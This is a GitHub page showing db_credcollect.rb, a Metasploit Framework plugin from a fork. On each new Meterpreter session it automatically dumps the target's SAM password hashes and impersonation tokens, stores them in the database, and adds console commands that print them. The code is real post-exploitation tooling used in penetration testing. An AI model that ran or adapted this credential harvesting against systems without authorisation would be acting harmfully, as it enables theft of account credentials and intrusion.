forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdb_credcollect.rb
104 lines (79 loc) · 2.23 KB
/
db_credcollect.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
# credcollect - tebo[at]attackresearch.com
module Msf
class Plugin::CredCollect < Msf::Plugin
include Msf::SessionEvent
class CredCollectCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
"credcollect"
end
def commands
{
"db_hashes" => "Dumps hashes collected in the database",
"db_tokens" => "Dumps tokens collected in the database with host information"
}
end
def cmd_db_hashes()
framework.db.each_note do |note|
if note.ntype == "auth_HASH"
print_line(note.data)
end
end
end
def cmd_db_tokens()
framework.db.each_note do |note|
if note.ntype == "auth_TOKEN"
print_line("#{note.host.address} - #{note.data}")
end
end
end
end
def on_session_open(session)
return if not self.framework.db.active
print_status("This is CredCollect, I have the conn!")
if (session.type == "meterpreter")
# Make sure we're rockin Priv and Incognito
session.core.use("priv")
session.core.use("incognito")
# It wasn't me mom! Stinko did it!
hashes = session.priv.sam_hashes
# Target infos for the db record
addr = session.sock.peerhost
host = self.framework.db.report_host_state(self, addr, Msf::HostState::Alive)
# Record hashes to the running db instance as auth_HASH type
hashes.each do |user|
type = "auth_HASH"
data = user.to_s
# We'll make this look like an auth note anyway
self.framework.db.get_note(self, host, type, data)
end
# Record user tokens
tokens = session.incognito.incognito_list_tokens(0).values
# Meh, tokens come to us as a formatted string
tokens = tokens.to_s.strip!.split("\n")
tokens.each do |token|
type = "auth_TOKEN"
data = token
self.framework.db.get_note(self, host, type, data)
end
end
end
def on_session_close(session)
end
def initialize(framework, opts)
super
self.framework.events.add_session_subscriber(self)
add_console_dispatcher(CredCollectCommandDispatcher)
end
def cleanup
self.framework.events.remove_session_subscriber(self)
remove_console_dispatcher('credcollect')
end
def name
"credcollect"
end
def desc
"Automatically grabs hashes and tokens from meterpreter session events and stores them in the db"
end
end
end